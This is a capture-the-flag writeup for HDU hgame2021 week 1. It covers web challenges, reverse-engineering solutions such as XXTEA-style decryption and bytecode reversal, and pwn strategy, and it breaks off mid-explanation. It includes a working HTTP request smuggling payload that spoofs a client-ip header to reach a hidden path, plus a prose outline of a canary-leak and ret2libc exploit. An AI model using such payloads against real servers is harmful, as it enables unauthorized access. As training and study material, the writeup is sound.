[Original] HDU hgame2021 week1 writeup
Posted: 2021-5-27 12:52 14823


HDU hgame2021 week1

web

Hitchhiking_in_the_Galaxy

HTTP request headers: add the header each step's hint asks for.

watermelon

Press F12, open project.js in the debugger and search for 1999.

Treasure Smuggler (宝藏走私者)

HTTP request smuggling.

```http
GET / HTTP/1.1
Host: thief.0727.site

GET /secret HTTP/1.1
Host:thief.0727.site
client-ip:127.0.0.1
foo:
```

IQ Tester (智商检测机)

```python
import json
import requests
from bs4 import BeautifulSoup
from sympy import symbols, integrate

# Session cookie issued by the challenge; the server hands out a new one after every answer.
SESSION = "session=eyJzb2x2aW5nIjoxfQ.YBfJbQ.L2PH1NyDzVTQcjiJjLR5lqeU4cw"
numArr = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "-", "+"]


def scan(str1):
    """Keep only digits and signs from a MathML node rendered as text."""
    newStr = ""
    for x in range(0, len(str1)):
        if str1[x] in numArr:
            newStr += str1[x]
    return newStr


def getQ(session=SESSION):
    """Fetch the current question; the JSON body carries the formula as MathML."""
    headers = {"Cookie": session}
    res = requests.get(url="http://r4u.top:5000/api/getQuestion", headers=headers)
    return json.loads(res.text)


def analyze(q):
    """Extract [lower, upper, a, sign, b] from the MathML of the definite
    integral of (a*x +/- b) dx; the nodes sit at fixed offsets in the tree."""
    q = q['question']
    soup = BeautifulSoup(q, "lxml")
    xiaxian = soup.msubsup.mo.next_sibling                  # lower limit
    shangxian = soup.msubsup.mo.next_sibling.next_sibling   # upper limit
    a = soup.math.mn
    a = a.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element
    b = soup.math.mn.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element
    fuhao = soup.math.mn.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element   # the + or - between a*x and b
    return [int(scan(str(xiaxian))), int(scan(str(shangxian))),
            int(scan(str(a))), scan(str(fuhao)), int(scan(str(b)))]


def calc(arr):
    """Evaluate the integral with sympy and round to two decimals, as the server expects."""
    print(arr)
    lower, upper, a, sign, b = arr
    x = symbols('x')
    if sign == "+":
        answer = integrate(a * x + b, (x, lower, upper))
    else:
        answer = integrate(a * x - b, (x, lower, upper))
    return round(answer, 2)


def submit(answer, cookie=SESSION):
    """Post the answer; the response sets the session cookie for the next question."""
    data = '{"answer":' + str(answer) + '}'
    print(data)
    headers = {"Cookie": cookie, "Content-Type": "application/json;charset=UTF-8"}
    res = requests.post(url="http://r4u.top:5000/api/verify", data=data, headers=headers)
    print(res.text)
    newCookie = res.headers.get('Set-Cookie')   # None once the server stops issuing one
    print(newCookie)
    return newCookie


def run(cookie):
    """Solve question after question until no new session cookie comes back
    (a loop instead of the original unbounded recursion)."""
    while cookie:
        q = getQ(cookie)
        answer = calc(analyze(q))
        cookie = submit(answer, cookie)


run("session=eyJzb2x2aW5nIjozfQ.YBfbuQ.R7aqFFYJmRgJ7FITfhRqfCKPNCg")
```

Smuggler's Fury (走私者的愤怒)

Same topic as Treasure Smuggler.
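An added example, not from the writeup, covering both Treasure Smuggler and Smuggler's Fury: a small front-end style check that splits one raw buffer into requests (using Content-Length, as a strict parser would) and reports what a proxy should log before forwarding anything: more than one request line in a single read, an unterminated header block, and client-supplied address headers such as the client-ip above. The sample buffer is constructed from the request quoted above with CRLF line endings; the function and header names are my own.

```python
import re

REQUEST_LINE = re.compile(rb"^[A-Z]+ \S+ HTTP/1\.[01]$")

# Constructed from the payload quoted above: two request lines arrive in a single
# read, the second with a client-ip header and an unterminated "foo:" header.
SAMPLE = (b"GET / HTTP/1.1\r\nHost: thief.0727.site\r\n\r\n"
          b"GET /secret HTTP/1.1\r\nHost:thief.0727.site\r\nclient-ip:127.0.0.1\r\nfoo:")


def parse_requests(buf):
    """Split one buffer into requests: the body length comes from Content-Length
    (0 if absent) and whatever is left over is treated as the next request."""
    reqs = []
    while buf:
        head, sep, rest = buf.partition(b"\r\n\r\n")
        lines = head.split(b"\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        try:
            clen = int(headers.get(b"content-length", b"0"))
        except ValueError:
            clen = 0
        reqs.append({"line": lines[0], "headers": headers,
                     "complete": bool(sep), "body": rest[:clen]})
        buf = rest[clen:]
    return reqs


def audit(buf):
    """Return the findings a front end should log before forwarding the buffer."""
    findings = []
    reqs = parse_requests(buf)
    if len(reqs) > 1:
        findings.append("multiple requests in one read: " +
                        ", ".join(r["line"].decode(errors="replace") for r in reqs))
    for r in reqs:
        if not REQUEST_LINE.match(r["line"]):
            findings.append("malformed request line: %r" % r["line"])
        if not r["complete"]:
            findings.append("unterminated header block after %r" % r["line"])
        for h in (b"client-ip", b"x-forwarded-for"):
            if h in r["headers"]:
                findings.append("client-supplied %s header on %r" % (h.decode(), r["line"]))
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```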

re

apacha


The main encryption flow is shown above: write the forward code, then invert it step by step.

```python
# Constants recovered from the binary: per-round deltas, the key and the encrypted flag.
v6l = [ 0x9E3779B9 , 0x3C6EF372, 0xDAA66D2B, 0x78DDE6E4, 0x1715609D, 0xB54CDA56, 0x5384540F]
v7l = [ 0x278DDE6E , 0xF1BBCDC, 0x36A99B4A, 0x1E3779B9, 0x5C55827, 0x2D533695, 0x14E11503]
key = [1, 2, 3, 4]
# 35 encrypted 32-bit words, one per flag byte
flag = [0xE74EB323, 0xB7A72836, 0x59CA6FE2, 0x967CC5C1, 0xE7802674, 0x3D2D54E6, 0x8A9D0356, 0x99DCC39C, 0x7026D8ED, 0x6A33FDAD, 0xF496550A, 0x5C9C6F9E, 0x1BE5D04C, 0x6723AE17, 0x5270A5C2, 0xAC42130A, 0x84BE67B2, 0x705CC779, 0x5C513D98, 0xFB36DA2D, 0x22179645, 0x5CE3529D, 0xD189E1FB, 0xE85BD489, 0x73C8D11F, 0x54B5C196, 0xB67CB490, 0x2117E4CA, 0x9DE3F994, 0x2F5AA1AA, 0xA7E801FD, 0xC30D6EAB, 0x1BADDC9C, 0x3453B04A, 0x92A406F9]


'''   Forward encryption, as reconstructed from the binary (kept for reference)
flag = b'hgame{aaaaaaaaaaaaaaaaaaaaaaaaaaaa}'
flag = list(flag)
v5 = flag[34]
for i in range(7):
    for j in range(34):
        v5 = flag[j] + ((((v5 >> 5) ^ (4 * flag[j + 1])) + ((16 * v5) ^ (flag[j + 1] >> 3))) ^ ((key[ (j ^ v7l[i] ) & 3 ] ^ v5) + (flag[j + 1] ^ v6l[i])))
        v5 &= 0xffffffff
        flag[j] = v5

    v5 = flag[34] + (((key[(34 ^ v7l[i]) & 3] ^ v5) + (flag[0] ^ v6l[i])) ^ (((4 * flag[0]) ^ (v5 >> 5)) + (((16 * v5) ^ (flag[0] >> 3))&0xffffffff)))
    v5 &= 0xffffffff
    flag[34] = v5
'''

# Decryption: run the 7 rounds backwards. Each round first undoes flag[34], which the
# forward pass updated last, then walks j from 33 down to 0 so that flag[j+1] is already
# restored while flag[j-1] still holds the value the forward pass used.
for x in range(7):
    i = 6 - x
    v5 = flag[34]
    flag[34] = v5 - ((((key[(34 ^ v7l[i]) & 3] ^ flag[33]) + (flag[0] ^ v6l[i])) ^ (((4 * flag[0]) ^ (flag[33] >> 5)) + ((16 * flag[33]) ^ (flag[0] >> 3))))&0xffffffff)
    flag[34]&=0xffffffff
    for y in range(34):
        j = 33 - y
        v5 = flag[j]
        # for j == 0, flag[j-1] wraps around to flag[34]
        flag[j] = v5 - (((((flag[j-1] >> 5) ^ (4 * flag[j + 1])) + ((16 * flag[j-1]) ^ (flag[j + 1] >> 3))) ^ ((key[ (j ^ v7l[i] ) & 3 ] ^ flag[j-1]) + (flag[j + 1] ^ v6l[i])))&0xffffffff)
        flag[j]&=0xffffffff
        if(j==0):
            # same computation spelled out with flag[34] (redundant, kept from the original)
            flag[j] = v5 - (((((flag[34] >> 5) ^ (4 * flag[j + 1])) + ((16 * flag[34]) ^ (flag[j + 1] >> 3))) ^ ((key[ (j ^ v7l[i] ) & 3 ] ^ flag[34]) + (flag[j + 1] ^ v6l[i])))&0xffffffff)
            flag[j]&=0xffffffff

print(bytes(flag))
```

HelloRe

Sign-in challenge; it is just an XOR.

pypy

Simple Python bytecode: write out the source by consulting the official documentation, then reverse it.

```python
# Source reconstructed from the bytecode: the flag body between 'hgame{' and '}'
# has adjacent characters swapped pairwise, then each byte is XORed with its index.
raw_flag = ''   # the flag, unknown at this point

cipher = list((raw_flag[6:-1]))

length = len(cipher)

for i in range(length//2):
    cipher[2*i],cipher[2*i+1] = cipher[2*i+1],cipher[2*i]

res=[]

for i in range(length):
    res.append(ord(cipher[i])^i)

res = bytes(res).hex()

# The value the program compares res against: the encoded flag as a hex string.
target = b'30466633346f59213b4139794520572b45514d61583151576638643a'
```
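The inverse of the transform above, as an added example that is not part of the original writeup: XOR with the index is its own inverse and the pairwise swap undoes itself, so decoding is the forward steps applied in reverse order. TARGET_HEX is the comparison value quoted above, and the 'hgame{' / '}' wrapper follows the raw_flag[6:-1] slice in the reconstructed source.

```python
# Comparison target quoted on the page (the encoded flag body as hex).
TARGET_HEX = '30466633346f59213b4139794520572b45514d61583151576638643a'


def encode(body: str) -> str:
    """Forward transform as reconstructed from the bytecode: swap adjacent
    characters pairwise, then XOR every byte with its index."""
    c = list(body)
    for i in range(len(c) // 2):
        c[2 * i], c[2 * i + 1] = c[2 * i + 1], c[2 * i]
    return bytes(ord(ch) ^ i for i, ch in enumerate(c)).hex()


def decode(hex_cipher: str) -> str:
    """Inverse: undo the XOR first (it is self-inverse), then undo the swap.
    An odd trailing character is untouched by both steps, as in the forward code."""
    data = bytes.fromhex(hex_cipher)
    c = [chr(b ^ i) for i, b in enumerate(data)]
    for i in range(len(c) // 2):
        c[2 * i], c[2 * i + 1] = c[2 * i + 1], c[2 * i]
    return ''.join(c)


def recover_flag(hex_cipher: str = TARGET_HEX) -> str:
    """Re-attach the 'hgame{' prefix and '}' suffix that raw_flag[6:-1] stripped."""
    return 'hgame{' + decode(hex_cipher) + '}'


if __name__ == '__main__':
    print(recover_flag())
```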

pwn

These pwn challenges are all very interesting: although they all test stack overflows and format strings, each has some interesting details.

whitegive

Sign-in challenge: the input is a number that gets compared with a string, and if they are equal it returns a shell.

Through debugging we found that what actually takes part in the comparison is the string's memory address.

So we just input that address and get a shell.

SteinsGate2

Week 1's final challenge; only seven solves so far.

All protections enabled.

First, read the source; you can find one leak point, one overflow point and one format-string vulnerability.

The leak point cannot overflow, but because printf only stops at \x00 it can leak the libc base. While debugging we also found that, besides the canary at [rbp-0x8], the stack still holds leftover canary values from earlier functions; since the canary stays the same for the whole run, we can get the canary value that way too.

The overflow point is a stack overflow that overwrites the return address: ret2libc.

The format-string vulnerability here is a trap: it exists, but after repeated debugging it turned out that the condition to trigger it can never be satisfied, which cost me a lot of time.

Leak point + overflow point is enough to get through.

Then you still have to read the source to get the conditions that trigger each vulnerability, that is, which fixed thing must be done on which day.

The overall flow is:

First, the input world-line divergence must differ from the initial world-line divergence by less than 0.000001, which satisfies know_true

